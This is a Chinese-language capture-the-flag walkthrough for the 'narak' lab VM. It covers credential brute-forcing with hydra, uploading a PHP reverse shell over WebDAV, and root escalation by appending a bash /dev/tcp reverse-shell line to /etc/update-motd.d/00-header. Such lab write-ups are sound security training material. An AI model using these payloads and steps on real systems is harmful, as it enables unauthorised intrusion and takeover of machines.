narak靶机攻略

narak靶机攻略

扫描

image-20231031205540225

image-20231031205601240

image-20231031205619177

渗透

cewl http://10.4.7.158 > use1.txt

hydra -L use1.txt -P use1.txt http-get://10.4.7.158/webdav -V -t 50 -f

image-20231031212051020

yamdoot:Swarg
cadaver http://10.4.7.158/webdav

image-20231031212319370

<?php
$ip='10.4.7.158';
$port=12138;
$sock = fsockopen($ip, $port);
$descriptorspec = array(
0 => $sock,
1 => $sock,
2 => $sock
);
$process = proc_open('/bin/sh ' , $descriptorspec,$pipes);
proc_close($process);

写一个php反弹shell

然后使用cadaver上传

image-20231031214241057

上传过后发现该文件

image-20231031214332316

kali监听,然后连接成功

使用python3获取回显

python3 -c 'import pty;pty.spawn("/bin/bash")'

image-20231031214512984

看到一个flag

image-20231031214713054

识别一下里面的字符,发现是md5

image-20231031214842438

解密一下

解不出来一点

在mnt下发现一个密码文件

image-20231031215407053

这一看就是brainfuck

--[----->+<]>---.+++++.+.+++++++++++.--.+++[->+++<]>++.++++++.--[--->+<]>--.-----.++++.

解密之后为chitragupt

这目录下还有一个密码文件

image-20231031215557310

解密为yamdoot:Swarg,就是登录web的账号密码

看一下/etc/passwd,有三个登录用户

image-20231031215830214

用刚才解密出来的疑似密码的试试登录

提权

最终发现inferno可以登录

image-20231031220201906

常规提权无果

筛选一下root可执行文件

find / -type f -user root -perm -ug=x,o=w -exec ls -l '{}' \; 2>/dev/null

image-20231031220644931

在Linux中,/etc/update-motd.d目录下的脚本和程序是以root用户的身份运行的。

/etc/motd是一个文本文件,用于在用户登录系统时显示一条消息。该消息通常用于向用户提供系统的重要信息、公告、警告或其他相关通知

理论上修改 motd 下的任何文件都可,提权时通常修改 /etc/update-motd.d/00-header 文件

echo "bash -c 'bash -i >& /dev/tcp/10.4.7.138/6789 0>&1'" >> /etc/update-motd.d/00-header

image-20231031221723147

将该命令写入,随后重进ssh

登录过后获取root

image-20231031221847736

image-20231031221915791

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值